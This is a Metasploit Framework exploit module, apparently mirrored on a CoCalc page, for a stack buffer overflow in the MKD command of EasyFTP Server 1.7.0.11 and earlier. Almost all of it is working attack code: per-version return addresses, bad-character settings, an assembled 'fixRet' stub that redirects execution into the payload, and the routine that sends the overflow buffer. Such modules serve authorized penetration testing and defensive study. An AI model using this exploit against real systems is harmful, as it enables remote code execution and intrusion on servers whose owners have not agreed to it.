CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'EasyFTP Server MKD Command Stack Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11

16
        and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which

17
        leads to a stack based buffer overflow.

18


19
        NOTE: EasyFTP allows anonymous access by default. However, in order to access the

20
        'MKD' command, you must have access to an account that can create directories.

21


22
        After version 1.7.0.12, this package was renamed "UplusFtp".

23


24
        This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'.

25
        This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by

26
        'fixing' the return address post-exploitation.  See references for more information.

27
      },

28
      'Author'         =>

29
        [

30
          'x90c <geinblues[at]gmail.com>',   # original version

31
          'jduck'   # port to metasploit / modified to use fix-up stub (works with bigger payloads)

32
        ],

33
      'License'        => MSF_LICENSE,

34
      'References'     =>

35
        [

36
          [ 'OSVDB', '62134' ],

37
          [ 'EDB', '12044' ],

38
          [ 'EDB', '14399' ]

39
        ],

40
      'DefaultOptions' =>

41
        {

42
          'EXITFUNC' => 'thread'

43
        },

44
      'Privileged'     => false,

45
      'Payload'        =>

46
        {

47
          'Space'    => 512,

48
          'BadChars' => "\x00\x0a\x0d\x2f\x5c",

49
          'DisableNops' => true

50
        },

51
      'Platform'       => 'win',

52
      'Targets'        =>

53
        [

54
          [ 'Windows Universal - v1.7.0.2',   { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe

55
          [ 'Windows Universal - v1.7.0.3',   { 'Ret' => 0x004041ec } ], # call ebp - from ftpbasicsvr.exe

56
          [ 'Windows Universal - v1.7.0.4',   { 'Ret' => 0x004041dc } ], # call ebp - from ftpbasicsvr.exe

57
          [ 'Windows Universal - v1.7.0.5',   { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

58
          [ 'Windows Universal - v1.7.0.6',   { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

59
          [ 'Windows Universal - v1.7.0.7',   { 'Ret' => 0x004041a1 } ], # call ebp - from ftpbasicsvr.exe

60
          [ 'Windows Universal - v1.7.0.8',   { 'Ret' => 0x00404481 } ], # call ebp - from ftpbasicsvr.exe

61
          [ 'Windows Universal - v1.7.0.9',   { 'Ret' => 0x00404441 } ], # call ebp - from ftpbasicsvr.exe

62
          [ 'Windows Universal - v1.7.0.10',  { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe

63
          [ 'Windows Universal - v1.7.0.11',  { 'Ret' => 0x00404411 } ], # call ebp - from ftpbasicsvr.exe

64
        ],

65
      'DisclosureDate' => '2010-04-04',

66
      'DefaultTarget' => 0))

67
  end

68


69
  def check

70
    connect

71
    disconnect

72


73
    if (banner =~ /BigFoolCat/)

74
      return Exploit::CheckCode::Detected

75
    end

76
      return Exploit::CheckCode::Safe

77
  end

78


79
  def make_nops(num)

80
    "C" * num

81
  end

82


83
  def exploit

84
    connect_login

85


86
    # NOTE:

87
    # This exploit jumps to ebp, which happens to point at a partial version of

88
    # the 'buf' string in memory. The fixRet below fixes up the code stored on the

89
    # stack and then jumps there to execute the payload. The value in esp is used

90
    # with an offset for the fixup.

91
    fixRet_asm = %q{

92
      mov edi,esp

93
      sub edi, 0xfffffe10

94
      mov [edi], 0xfeedfed5

95
      add edi, 0xffffff14

96
      jmp edi

97
    }

98
    fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string

99


100
    buf = ''

101


102
    print_status("Prepending fixRet...")

103
    buf << fixRet

104
    buf << make_nops(0x20 - buf.length)

105


106
    print_status("Adding the payload...")

107
    buf << payload.encoded

108


109
    # Patch the original stack data into the fixer stub

110
    buf[10, 4] = buf[268, 4]

111


112
    print_status("Overwriting part of the payload with target address...")

113
    buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes

114


115
    print_status("Sending exploit buffer...")

116
    send_cmd( ['MKD', buf] , false)

117


118
    handler

119
    disconnect

120
  end

121
end

122


123